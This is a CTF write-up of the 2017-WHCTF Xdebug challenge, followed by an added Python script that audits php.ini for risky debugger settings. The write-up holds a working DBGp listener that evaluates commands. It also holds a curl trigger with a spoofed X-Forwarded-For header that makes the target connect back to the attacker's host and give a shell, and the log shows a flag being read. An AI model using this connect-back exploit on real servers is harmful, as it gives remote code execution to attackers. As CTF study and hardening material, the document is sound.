Topic: Xdebug exploitation. Source: 2017-WHCTF. This challenge is temporarily unusable because its environment has no outbound network access.

    The PHPINFO output shows that Xdebug has the following settings enabled:

    1. xdebug.remote_enable = On
    2. xdebug.remote_connect_back = On

    So commands can simply be executed through Xdebug. The exploit is as follows:

    #!/usr/bin/python2 
    import socket
    
    ip_port = ('0.0.0.0',9000)
    sk = socket.socket()
    sk.bind(ip_port)
    sk.listen(10)
    conn, addr = sk.accept()
    
    while True:
        client_data = conn.recv(1024)
        print(client_data)
    
        data = raw_input('>> ')
        conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
    

    Run the exploit on a server that is reachable from the internet, then run this command:

    curl '220.249.52.133:36208/phpinfo.php?XDEBUG_SESSION_START=233' -H "X-Forwarded-For: 175.24.98.3"
    

    The Xdebug shell connects back:

    ricter@baka:/tmp$ python xdebug_exp.py
    495<?xml version="1.0" encoding="iso-8859-1"?>
    <init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///app/phpinfo.php" language="PHP" xdebug:language_version="7.0.22-0ubuntu0.16.04.1" protocol_version="1.0" appid="11" idekey="233"><engine version="2.6.0-dev"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
    >> system("cat /flag.txt");
    288<?xml version="1.0" encoding="iso-8859-1"?>
    <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="string" size="25" encoding="base64"><![CDATA[V0hDVEZ7WGQzYnVnXzFzX2F3M3NvbUUhfQ==]]></property></response>
    >> Traceback (most recent call last):
      File "xdebug_exp.py", line 14, in <module>
        data = raw_input('>> ')
    EOFError
    
    ricter@baka:/tmp$ echo V0hDVEZ7WGQzYnVnXzFzX2F3M3NvbUUhfQ== | base64 -d
    WHCTF{Xd3bug_1s_aw3somE!}
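
A configuration check for the two settings this write-up depends on, added here as an example and not part of the original write-up. It goes beyond the page by also covering the Xdebug 3 renames (`xdebug.mode`, `xdebug.discover_client_host`); the function names and sample ini text are constructed for illustration.

```python
# Added example: audit php.ini text for the Xdebug settings this write-up relies on.
TRUTHY = {"1", "on", "yes", "true"}

# Constructed sample inputs (not taken from the challenge server).
WEAK_INI = """
zend_extension=xdebug.so
xdebug.remote_enable = On
xdebug.remote_connect_back = On
"""
PINNED_INI = """
xdebug.remote_enable = On
xdebug.remote_connect_back = Off   ; connect only to remote_host
xdebug.remote_host = 127.0.0.1
"""
XDEBUG3_INI = """
xdebug.mode = develop,debug
xdebug.discover_client_host = 1
"""


def parse_ini(text):
    """Return {directive: value}; a later assignment overrides an earlier one."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ';' comments
        if "=" not in line or line.startswith("["):
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip("\"'").lower()
    return settings


def audit_xdebug(text):
    """Return 'critical', 'warning' or 'ok' for the debugger exposure."""
    s = parse_ini(text)
    modes = {m.strip() for m in s.get("xdebug.mode", "").split(",")}
    # Xdebug 2 directive names (as in the phpinfo output) and their Xdebug 3 renames.
    debugger_on = s.get("xdebug.remote_enable") in TRUTHY or "debug" in modes
    connect_back = (s.get("xdebug.remote_connect_back") in TRUTHY
                    or s.get("xdebug.discover_client_host") in TRUTHY)
    if debugger_on and connect_back:
        return "critical"  # debugger dials whatever address the HTTP client claims
    if debugger_on:
        return "warning"   # debugger enabled; target limited to the configured host
    return "ok"


if __name__ == "__main__":
    for name, ini in [("weak", WEAK_INI), ("pinned", PINNED_INI), ("xdebug3", XDEBUG3_INI)]:
        print(name, audit_xdebug(ini))
```

On a production host the expected result is `ok`: the debugger extension should not be loaded at all, and a `warning` host still exposes a debug session to whatever listens on the configured address.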